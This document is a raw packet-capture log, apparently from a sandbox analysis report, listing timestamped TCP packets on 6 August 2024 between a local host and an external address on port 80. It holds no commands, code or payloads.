                                                                                                                                    Aug 6, 2024 10:30:30.719008923 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719023943 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719032049 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.719177008 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719228983 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.719352961 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719364882 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719376087 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719386101 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719397068 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719408035 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719419003 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719429970 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719444036 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.719444036 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.719501972 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.719523907 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719542027 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719553947 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719564915 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719575882 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719585896 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.719608068 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.719726086 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.720052958 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720065117 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720077991 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720143080 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.720143080 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.720335960 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720355034 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720380068 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720391989 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720403910 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720407963 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.720415115 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720426083 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720432043 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720443010 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720447063 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.720457077 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720468044 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720487118 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.720491886 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.720504045 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.720541954 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:30.804869890 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:30.848934889 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.012147903 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012202978 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012239933 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012281895 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.012434959 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012469053 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012486935 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.012522936 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012557983 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012592077 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012597084 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.012623072 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012656927 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012689114 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012701035 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.012701035 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.012722015 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012763023 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012794971 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012813091 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.012828112 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012855053 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.012860060 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012892962 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012912035 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.012927055 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.012984991 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.013011932 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013042927 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013077974 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013092995 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.013111115 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013144970 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013154984 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.013178110 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013212919 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013245106 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013261080 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.013278008 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013305902 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.013309956 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013343096 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013374090 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.013374090 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013406992 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013428926 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.013438940 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013478041 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.013492107 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.016408920 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016459942 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.016463041 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016515017 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016561031 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.016565084 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016597986 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016645908 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016649961 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.016680002 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016729116 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016732931 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.016777039 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016809940 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016841888 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016851902 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.016880035 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.016890049 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016943932 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.016992092 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017000914 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.017024040 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017060041 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017091990 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017124891 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017137051 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.017137051 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.017157078 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017189026 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017203093 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.017220020 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017276049 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017285109 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.017308950 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017340899 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017371893 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017389059 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.017404079 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.017443895 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.021648884 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.021728992 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.021747112 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.067655087 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.341310978 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341386080 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341420889 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341454029 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341476917 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.341506004 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341511965 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.341538906 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341573000 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341604948 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341629028 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.341639042 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341672897 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341691017 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.341705084 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341737986 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341768026 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.341774940 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341782093 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.341808081 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341840029 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341854095 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.341872931 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341906071 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341936111 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.341942072 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341974974 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.341990948 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342008114 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342051983 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342058897 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342093945 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342144966 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342176914 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342192888 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342242002 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342258930 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342307091 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342308998 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342340946 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342372894 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342389107 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342389107 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342405081 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342442989 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342473984 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342483044 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342506886 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342539072 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342545033 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342571020 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342587948 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342605114 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342638969 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342688084 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342714071 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342721939 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342746973 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342752934 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342803001 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342840910 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342850924 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342884064 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342932940 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342957020 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342966080 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.342995882 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.342998981 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343035936 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343070030 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343102932 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343115091 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.343115091 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.343136072 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343169928 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343199968 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343208075 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.343234062 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343266964 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343302011 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343312979 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.343312979 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.343391895 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343482971 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343509912 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.343530893 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343564987 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343595982 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343628883 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343662024 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.343661070 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.343662024 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.343745947 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.429812908 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.473922968 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689155102 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689173937 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689184904 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689196110 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689208031 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689230919 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689248085 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689259052 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689264059 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689264059 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689270020 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689281940 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689292908 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689292908 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689302921 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689313889 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689373970 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689403057 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689414978 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689424992 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689436913 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689449072 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689486027 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689492941 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689759016 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689770937 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689780951 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689790964 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689802885 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689814091 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689815998 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689827919 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689853907 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689927101 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689938068 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689949036 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689960003 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689971924 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.689990044 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.689990044 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.690028906 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.690339088 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690349102 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690361023 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690392971 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.690525055 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690536022 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690546989 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690557003 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690572977 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690587044 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.690587044 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.690623045 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.690655947 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690668106 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690680981 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690690994 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690701962 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690718889 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.690781116 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.690789938 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690800905 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.690849066 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.691167116 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.691176891 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.691188097 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.691198111 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.691209078 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.691220045 CEST804977927.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:31.691221952 CEST4977980192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:31.691221952 CEST4977980192.168.2.627.221.16.149
